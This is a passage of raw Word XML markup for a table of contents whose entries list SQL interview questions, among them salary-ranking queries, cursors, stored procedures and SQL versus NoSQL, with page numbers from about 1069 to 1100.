            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1069</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57D9FBCE" w14:textId="42E0016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7867987 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1071</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="609DEB1F" w14:textId="2F202B8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7867988 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1073</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2551E393" w14:textId="4F973AF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To get emp_sal &gt; 5000 and company_name = "Kotak"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867989 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1074</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="519433AD" w14:textId="44EE6C8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7867990 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1074</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3D8F534F" w14:textId="4251D98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7867991 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1075</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E7BC0E9" w14:textId="295D5A6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7867992 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1076</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CA481DD" w14:textId="46ED7E7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7867993 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1078</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E16BF3F" w14:textId="736C1C8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7867994 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1080</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="09B3A410" w14:textId="5C13DF0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To find the name of a city which has more than one customer in it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867995 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1080</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BA9BAED" w14:textId="7A9472A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10th highest salary of employee?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867996 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1081</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4974EA04" w14:textId="74852EE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DDL and DML commands?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197867997 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1081</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="25428614" w14:textId="12385F0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7867998 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1082</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="041E72F4" w14:textId="663D20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79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7867999 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1082</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F2CAB45" w14:textId="71A097C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7868000 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1083</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0FB34B7D" w14:textId="6B7C110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Get the youngest employee from the employee table?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868001 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1084</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C63B095" w14:textId="34A29C7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Get list of employees from Finance department?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868002 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1084</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="477A2A7B" w14:textId="1DCC999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7868003 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1084</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="34BC8F52" w14:textId="6BC1C85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7868004 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1085</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40D30013" w14:textId="39D589B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Cursor?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868005 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1085</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79B6B716" w14:textId="1BA08BE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implicit cursor and explicit cursor?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868006 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1086</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="719AAD31" w14:textId="4733232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7868007 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1086</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55F327B6" w14:textId="2B02A8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7868008 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1087</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C475525" w14:textId="015F64F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tored Procedure? What is the use of stored procedure?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868009 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1088</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="079A5917" w14:textId="7686EA4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7868010 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1089</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47588984" w14:textId="2EC8E8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7868011 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1091</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2AA075B4" w14:textId="380B791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Display a list of students which have a Mathematics subject?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868012 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1093</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="68D051AE" w14:textId="78B33F0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3rd highest salary of an employee?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868013 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1093</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1ADA7181" w14:textId="2C323B0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7868014 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1094</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49412DEA" w14:textId="6BC7A32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QL and NoSQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868015 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1095</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="648B51DB" w14:textId="594B0D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7868016 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1097</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FD03552" w14:textId="33658BB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7868017 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1098</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="019A60D0" w14:textId="7ECA5AA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8" w:history="1">
            <w:r w:rsidRPr="006E6F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Consider 2 tables, find out 3 employees who are earning the highest salary in each department?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868018 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001725B1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1100</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A80ACC2" w14:textId="4914C46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that categorizes employees based on their salary into different percentage ranges.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc197868019 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
